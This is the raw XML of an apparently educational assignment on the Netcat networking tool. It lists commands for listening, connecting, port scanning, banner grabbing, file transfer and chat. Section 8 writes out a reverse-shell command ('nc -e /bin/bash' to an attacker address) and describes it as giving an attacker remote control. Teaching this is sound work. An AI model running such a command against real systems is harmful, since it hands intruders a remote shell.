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A3A17" w14:textId="77777777" w:rsidR="000D5AC4"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w:t>
      </w:r>
      <w:r w:rsidR="000D5AC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280CEE8"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Netcat (nc) Command Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628E7DDC"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Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5AC4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> This assignment provides an overview of the </w:t>
      </w:r>
      <w:r w:rsidRPr="000D5AC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Netcat (nc)</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5AC4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool, which is a powerful networking utility. Known as the "Swiss army knife" of networking, it is used for reading and writing data across network connections using the TCP/IP protocol. Netcat can be used for a variety of tasks, including port scanning, banner grabbing, and acting as a listener or client for TCP and UDP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7F4A20"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6D271F18">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B6201"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 Start a Simple TCP Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FB7290"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4066F2F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&lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4884338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allows Netcat to listen on the specified port. It can be used to set up a server-like process for receiving incoming connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BA235B"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09EB14F5" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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 Listen mode, wait for incoming connections on the specified port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8FA5A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13D2459E"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1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE55F67" w14:textId="3B1BDE98" w:rsidR="00C630CA" w:rsidRPr="000D5AC4" w:rsidRDefault="00C630CA" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="476B6A86" wp14:editId="7EE2614E">
            <wp:extent cx="1933333" cy="666667"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="124820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01219" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1933333" cy="666667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C58B5B"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10E0CC44">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="297FC414"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2. Connect to a Remote Host (Client Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2591F89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6BF9F9E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&lt;target_ip&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5700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allows you to connect to a remote host and port. It is typically used to initiate a connection to a server or another machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D7BDA5"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30933B95" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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&lt;target_ip&gt;: The IP address or hostname of the target to connect to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B619866" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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&lt;port&gt;: The port on the target machine to connect to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A204FA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149CA844"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192.168.1.1 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E40A109" w14:textId="6FC1932F" w:rsidR="00C630CA" w:rsidRPr="000D5AC4" w:rsidRDefault="00C630CA" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7038769F" wp14:editId="412B980A">
            <wp:extent cx="2933333" cy="523810"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="133095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6483" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2933333" cy="523810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EFF013"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1B08F996">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D9EBA9"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3. TCP Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E32754E"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00CB130C"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-zv &lt;target_ip&gt; &lt;start_port&gt;-&lt;end_port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A66172"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lastRenderedPageBreak/>
        <w:t>Functionality:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5AC4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> This command is used to scan a range of ports on the target system. The -z option makes Netcat just scan without sending any data, and the -v option enables verbose mode, showing details of open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF4FAB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27438C46" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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-z: Scan mode without sending data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65691B5D" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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-v: Verbose mode to show more details about the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BB8FF"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5004CBED"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-zv 192.168.1.1 20-80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A53E35" w14:textId="79980F39" w:rsidR="00C630CA" w:rsidRPr="000D5AC4" w:rsidRDefault="00C630CA" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C630CA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="598CFB49" wp14:editId="109109D9">
            <wp:extent cx="4124901" cy="628738"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="70699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7140" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4124901" cy="628738"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63103343"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425BC1C3">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B8E51"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4. Banner Grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DFB8BB"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4CBEA8C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&lt;target_ip&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495E127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Netcat can be used to grab banners from remote services to gather information about the target system (e.g., software versions, service details). This is commonly used in penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F74B3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020CD9EB"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192.168.1.1 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210BF8C"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After connecting, you can type a simple HTTP request (like GET / HTTP/1.1), and the server might respond with a banner containing its software details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E5873C" w14:textId="3BBAD399" w:rsidR="00C630CA" w:rsidRPr="000D5AC4" w:rsidRDefault="00C630CA" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C630CA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="095476BE" wp14:editId="085C088E">
            <wp:extent cx="4315427" cy="743054"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98829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0408" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4315427" cy="743054"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17913A07"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5525409D">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="396BD2B2"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5. UDP Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787EBA52"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30BEDCD1"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-u &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A0FAD"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sets up Netcat to listen on a UDP port instead of the default TCP port. UDP is a connectionless protocol and is useful for applications like streaming or real-time communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A819D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20F43D93" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>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-u: Listen for UDP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EAFC8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55E6B5DC"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-u 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C328A37" w14:textId="6299DFB0" w:rsidR="00C630CA" w:rsidRPr="000D5AC4" w:rsidRDefault="00C630CA" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C630CA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="442746D1" wp14:editId="31D49EA3">
            <wp:extent cx="1914792" cy="447737"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="15476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0917" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1914792" cy="447737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDBAB91"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lastRenderedPageBreak/>
        <w:pict w14:anchorId="112C9AA9">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5189B5"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6. Send a File Over the Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1CA8C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0984248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&lt;target_ip&gt; &lt;port&gt; &lt; &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A0C1C"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Netcat can be used to send a file to a remote machine over a network connection. The file content will be transferred over the specified port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2F696F"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3BECAA4E" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>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&lt;file&gt;: The file you want to send.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E4A2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337F8F83"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192.168.1.1 1234 &lt; myfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1F48C0" w14:textId="085CB530" w:rsidR="000F3B60" w:rsidRPr="000D5AC4" w:rsidRDefault="000F3B60" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F3B60">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="679F949A" wp14:editId="7014D18D">
            <wp:extent cx="2772162" cy="466790"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="71947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72567" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2772162" cy="466790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB16A29"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7735EDC7">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14427682"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7. Receive a File Over the Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C91FA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42D0665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&lt;port&gt; &gt; &lt;file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3108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listens for an incoming connection and writes the received data to a file. It is used in conjunction with the sending command to receive files over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE5E6B"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1A08F202" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>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&lt;file&gt;: The file where the incoming data will be saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643906F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7ACD6CE6"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1234 &gt; receivedfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B7E00" w14:textId="24C59D29" w:rsidR="006541B3" w:rsidRPr="000D5AC4" w:rsidRDefault="006541B3" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006541B3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C2AF5C0" wp14:editId="2722A802">
            <wp:extent cx="2934109" cy="457264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133620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08894" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2934109" cy="457264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D7A9B8"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6AEFE7D2">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D96BC8E"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8. Create a Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACC5CB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5D0DBD1C"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-e /bin/bash &lt;attacker_ip&gt; &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731CB2D6"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sets up a reverse shell, allowing an attacker to gain command-line access to the target machine. The target machine connects back to the attacker's system, providing remote control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05A983"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0744E47B" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>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-e: Executes a program after connecting (in this case, /bin/bash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C97482" w14:textId="0387648A" w:rsidR="006541B3"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F864F56"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-e /bin/bash 192.168.1.1 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E5D22E" w14:textId="3A756FDF" w:rsidR="006541B3" w:rsidRPr="000D5AC4" w:rsidRDefault="006541B3" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006541B3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46517F0D" wp14:editId="73F5E1B3">
            <wp:extent cx="2825750" cy="447886"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="185818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80113" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2865617" cy="454205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E78C6"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lastRenderedPageBreak/>
        <w:pict w14:anchorId="109D5F4C">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="408C184D"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9. Chat Over the Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598D09AE"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12B92B8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&lt;port&gt;    # On one machine (listener)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C7D9A5"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&lt;target_ip&gt; &lt;port&gt;  # On the other machine (client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5759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Netcat can be used as a simple chat tool. One machine listens on a port while the other connects to it, allowing two-way communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD1C3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2C203536" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRPr="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>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On machine 1: nc -l 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA61A2D" w14:textId="77777777" w:rsidR="000D5AC4" w:rsidRDefault="000D5AC4" w:rsidP="000D5AC4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>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On machine 2: nc 192.168.1.1 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102A7B7E" w14:textId="04800EEC" w:rsidR="000F3B60" w:rsidRPr="000D5AC4" w:rsidRDefault="000F3B60" w:rsidP="000F3B60">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-79"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7966D674" wp14:editId="793E11A7">
            <wp:extent cx="1933333" cy="666667"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="15209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01219" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1933333" cy="666667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FC91468" wp14:editId="2020A040">
            <wp:extent cx="2933333" cy="523810"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="210011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6483" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
